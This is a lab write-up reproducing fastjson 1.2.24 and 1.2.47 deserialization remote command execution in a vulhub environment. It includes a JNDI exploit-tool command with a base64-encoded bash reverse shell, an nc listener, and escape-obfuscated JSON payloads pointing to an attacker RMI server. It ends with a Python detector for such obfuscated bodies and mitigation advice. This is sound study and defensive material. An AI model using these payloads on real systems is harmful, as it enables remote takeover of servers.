fastjson

fastjson vulnerability reproduction

fastjson 1.2.24 deserialization leading to arbitrary command execution

vulhub is used as the vulnerable environment.
Attacker machine: 192.168.20.128
Target machine: 192.168.20.140

xray detects the vulnerability.

Vulnerability reproduction

Here the JNDI-Injection-Exploit-Plus-2.2-SNAPSHOT-all.jar tool is used to start the RMI service:

java -jar JNDI-Injection-Exploit-Plus-2.2-SNAPSHOT-all.jar -C "/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC81NTU1IDA+JjE=}|{base64,-d}|{/bin/bash,-i}"

Listen on port 5555, then send the payload:
POST / HTTP/1.1
Host: 192.168.20.140:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 281
Content-Type: application/json
Accept-Encoding: gzip
{
"883n6v": {
"@ty\u0070\x65": "L\u0063\x6Fm.\u0073\x75\u006E\u002E\u0072\u006F\u0077\x73e\u0074\u002EJ\x64\u0062c\u0052o\u0077\u0053\x65tImp\x6C;",
"dataSourceName": "rmi://192.168.20.128:1099/remoteExploit8",
"autoCommit": true
}
}
A shell is obtained successfully.

Fastjson 1.2.47 remote command execution vulnerability

vulhub is used as the vulnerable environment.
Attacker machine: 192.168.20.128
Target machine: 192.168.20.140

xray detects the vulnerability.

Vulnerability reproduction

Here the JNDI-Injection-Exploit-Plus-2.2-SNAPSHOT-all.jar tool is used to start the RMI service:

java -jar JNDI-Injection-Exploit-Plus-2.2-SNAPSHOT-all.jar -C "/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC81NTU1IDA+JjE=}|{base64,-d}|{/bin/bash,-i}"

Listen on port 5555:

nc -lvvp 5555

Send the payload:
POST / HTTP/1.1
Host: 192.168.20.140:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 434
Content-Type: application/json
Accept-Encoding: gzip
{
"f345ry":{"\x40typ\u0065":"java.lang.Class","val":"\u0063om.s\u0075\x6E\u002E\u0072ows\x65t.J\x64b\x63\u0052ow\u0053\u0065t\u0049mpl"},
"twr68p":{{
"\x40typ\u0065": "com.alibaba.fastjson.JSONObject",
"8itdzo":
{"\x40typ\u0065":"\u0063om.s\u0075\x6E\u002E\u0072ows\x65t.J\x64b\x63\u0052ow\u0053\u0065t\u0049mpl","dataSourceName":"rmi://192.168.20.128:1099/remoteExploit8","autoCommit":true}
}:{}}
}
The reverse connection is established successfully.
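Both request bodies above hide the `@type` key and the `com.sun.rowset.JdbcRowSetImpl` class name behind `\uXXXX` and `\xXX` escapes, so a WAF or log rule that greps for the plain strings misses them. The following detector is an added example written for this write-up; it is not part of the original post, vulhub, or xray. It resolves both escape forms on the raw text (a strict JSON parser would reject the `\x` escapes and the object-as-key syntax that fastjson accepts), then checks the normalized body for the autotype key, the gadget class names seen in the two payloads, and `rmi://` or `ldap://` references. The two sample bodies are the ones from the 1.2.24 and 1.2.47 sections; the benign body is constructed. The class list and the `is_suspicious` threshold are assumptions for illustration and would be tuned per deployment.

```python
import re

# fastjson resolves standard JSON \uXXXX escapes and also a non-standard \xXX form.
# Normalizing both before inspection is what defeats the obfuscation in the payloads.
_ESCAPE = re.compile(r'\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})')

# Illustrative class list (assumption): the gadgets appearing in the two payloads above.
SUSPICIOUS_CLASSES = (
    'com.sun.rowset.JdbcRowSetImpl',
    'java.lang.Class',
)
AUTOTYPE_KEY = '@type'
REMOTE_REF = re.compile(r'\b(?:rmi|ldap)://[^"\s]+', re.IGNORECASE)


def unescape_fastjson(text: str) -> str:
    """Replace \\uXXXX and \\xXX escapes with the characters they encode."""
    def repl(match: re.Match) -> str:
        hexval = match.group(1) or match.group(2)
        return chr(int(hexval, 16))
    return _ESCAPE.sub(repl, text)


def inspect_body(body: str) -> dict:
    """Inspect a raw request body without parsing it as JSON."""
    normalized = unescape_fastjson(body)
    return {
        'obfuscated': normalized != body,            # escapes were hiding something
        'has_autotype': AUTOTYPE_KEY in normalized,  # fastjson autotype trigger
        'classes': [c for c in SUSPICIOUS_CLASSES if c in normalized],
        'remote_refs': [m.group(0) for m in REMOTE_REF.finditer(normalized)],
    }


def is_suspicious(body: str) -> bool:
    """Flag bodies that use @type together with a known gadget class or a remote reference."""
    r = inspect_body(body)
    return r['has_autotype'] and bool(r['classes'] or r['remote_refs'])


# Sample body from the 1.2.24 section of the write-up.
PAYLOAD_1224 = r'''{
"883n6v": {
"@ty\u0070\x65": "L\u0063\x6Fm.\u0073\x75\u006E\u002E\u0072\u006F\u0077\x73e\u0074\u002EJ\x64\u0062c\u0052o\u0077\u0053\x65tImp\x6C;",
"dataSourceName": "rmi://192.168.20.128:1099/remoteExploit8",
"autoCommit": true
}
}'''

# Sample body from the 1.2.47 section of the write-up (not valid strict JSON, fastjson accepts it).
PAYLOAD_1247 = r'''{
"f345ry":{"\x40typ\u0065":"java.lang.Class","val":"\u0063om.s\u0075\x6E\u002E\u0072ows\x65t.J\x64b\x63\u0052ow\u0053\u0065t\u0049mpl"},
"twr68p":{{
"\x40typ\u0065": "com.alibaba.fastjson.JSONObject",
"8itdzo":
{"\x40typ\u0065":"\u0063om.s\u0075\x6E\u002E\u0072ows\x65t.J\x64b\x63\u0052ow\u0053\u0065t\u0049mpl","dataSourceName":"rmi://192.168.20.128:1099/remoteExploit8","autoCommit":true}
}:{}}
}'''

# Constructed benign body for comparison.
BENIGN = '{"user":"alice","roles":["viewer"],"note":"caf\\u00e9"}'


if __name__ == '__main__':
    for name, body in (('1.2.24', PAYLOAD_1224), ('1.2.47', PAYLOAD_1247), ('benign', BENIGN)):
        print(name, is_suspicious(body), inspect_body(body))
```

The detector deliberately works on the raw text rather than a parsed object, so it still fires on the 1.2.47 body whose `{{...}:{}}` construct no standard JSON library will accept. Treat a hit as a reason to block or alert; the durable fix is disabling autotype (or upgrading fastjson and keeping the safeMode setting on) rather than matching class names.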